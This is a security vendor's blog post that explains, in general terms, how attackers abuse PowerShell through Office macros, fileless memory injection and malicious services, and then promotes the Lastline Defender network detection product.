PowerShell: A Handy Tool for Conducting Digital Attacks
Any attacker worth their salt know that foreign software can raise a red flag with your network monitoring tools or endpoint management products. That’s why they’re increasingly turning to “living off the land” (LotL) techniques, which involve exploiting commonly available tools and native software so that they can evade detection. One of the tools that’s most widely used for LotL attacks is PowerShell, an inherent part of the Windows OS.
In this blog post I will describe why PowerShell makes an ideal attack vector for malicious actors and provide some examples of how they’re abusing PowerShell. I’ll then make clear how these types of attacks are on the rise and illuminate how a Network Detection and Response (NDR) tool can help defend you against these attacks.
PowerShell – A Primer
PowerShell is a native Windows command-line shell commonly used by system administrators. Because it is built right into Windows, it’s completely trusted. Like many shell scripting languages, PowerShell enables users to access the file system on a computer. But it also extends this ease of access to other parts of Windows, including the registry and the digital signature certificate stores. This means that someone with malicious intentions can use PowerShell to essentially achieve unrestricted access to the OS.
What’s more, PowerShell has the ability to run remotely through the Windows Remote Management (WinRM) service. This makes it possible for a threat actor to get up to all kinds of trouble, such as bypassing a firewall and remotely running scripts for the purpose of installing malware. Even if WinRM is turned off, digital attackers can turn it back on using Windows Management Instrumentation (commonly known as WMI) with a single line of code.
How Digital Attackers Abuse PowerShell
What are some of the common ways PowerShell can be abused by an attacker? While this is by no means an exhaustive list, here are some examples:
- Using macros inside Office attachments to execute malicious PowerShell commands: Seeing a phishing or malicious email with a Microsoft Office file attachment is not new nor novel. In some of the attempted attacks we’ve seen in recent months, attackers are embedding PowerShell into macros inside these files. The malicious PowerShell executes malicious commands or scripts in the background. Sometimes those files take the form of an Internet query (IQY) file attachment. Back in August 2018, for instance, Malware.News revealed that digital attackers had begun using these file types in conjunction with Excel’s Dynamic Data Exchange (DDE) feature to target Japanese users with BEBLOH or URSNIF malware.
- Injecting malicious code into memory: “Fileless” attacks continue to increase, and attackers are often using PowerShell as their weapon of choice to inject malware directly into memory. This has been very successful against traditional antivirus software, as the malicious program isn’t writing anything to the disk where the AV is watching. Cynet reported on this activity in a Sodinokibi ransomware attack back in August 2019.
- Installing services: A Windows service is a program that runs hidden from the end user’s view and typically is set to turn itself on when Windows starts. We’ve seen some successful attacks where malicious PowerShell scripts are installed as Windows services and are then used to install other malicious software. Thankfully this is still relatively rare, but watching for new services installed on your endpoints can be a good way to catch something before it becomes a major issue.
PowerShell Attacks on the Rise
The bottom line here is simple: attacks involving PowerShell are on the rise. Indeed, Dark Reading wrote a piece showing a 432% increase in PowerShell malware between 2016 and 2017. Homeland Security Today wrote about an even bigger jump in malicious PowerShell activity between mid-2017 and mid-2018 at 661%.
It’s obvious to me that an important part of your security strategy going forward must include the ability to defend against malicious PowerShell attacks. Sure, one of the best ways you can do this is by disabling the native Windows command-line shell entirely – if you’re not using it. If you do need it for certain things, you can always disable whatever features you’re not using and make sure that the version of PowerShell you’re using is up to date. Of course, that’s not going to prevent a malicious attack if an end user opens up something they shouldn’t have and allows that malicious PowerShell to gain a foothold.
That’s where Lastline Defender comes in. This NDR platform monitors and blocks malicious behaviors on the network associated with PowerShell. Not only that, but Lastline also uses file analysis to analyze script execution behavior, thereby identifying obfuscation and evasion techniques used. In either case, you’re covered: if Lastline Defender can see the original artifact that came in, it will detect the anomalous use of PowerShell and alert your SOC to the event. If the artifact wasn’t seen (for example if the device was off-network at the time), Lastline Defender will detect the malicious activity of the artifact the moment it does something off the device (call home, download another malicious payload, move laterally inside your network, etc.).